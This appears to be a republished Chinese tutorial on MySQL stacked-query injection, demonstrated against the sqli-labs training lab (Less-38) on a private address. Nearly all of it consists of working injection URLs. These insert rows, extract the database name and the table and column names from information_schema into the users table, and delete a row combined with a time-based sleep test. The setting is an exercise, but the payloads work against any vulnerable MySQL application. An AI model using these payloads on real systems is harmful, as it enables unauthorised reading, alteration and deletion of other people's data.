Mysql注入 -- 堆叠注入

Posted web安全工具库

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Mysql注入 -- 堆叠注入相关的知识,希望对你有一定的参考价值。

你上学时没读过的书、没上过的课、没跑过的步,总有一天会让你全部还回来。。。

----  网易云热评

 

一、堆叠注入介绍

1、多条sql语句同时执行

2、union只能执行查询语句,堆叠可以执行增删改查

3、同时执行三条语句

select 1;select 2;select 3;

二、插入注入

1、找到注入点,添加一条数据

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(66,'aiyou','bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=66

2、获取数据库名称

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(67,database(),'bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=67获取数据库名称

3、获取数据库中的表名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(71,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 2,1) ,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=71获取表名信息

4、获取表中的字段名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(74,(select column_name from information_schema.columns where table_name="users" limit 13,1) ,(select column_name from information_schema.columns where table_name="users" limit 12,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=74获取字段信息

三、删除删除注入

http://192.168.139.129/sqli/Less-38/?id=1';delete from users where id=74 and sleep(if((select database())=0x7365637572697479,5,0));

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

以上是关于Mysql注入 -- 堆叠注入的主要内容,如果未能解决你的问题,请参考以下文章

堆叠注入tips

Sqli-labs Less-53 order by后的堆叠注入

Sqli-labs Less-52 order by后的堆叠注入

SQL注入---[强网杯 2019]随便注---day01

(手工)sqli-labs4041堆叠注入盲注

以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响?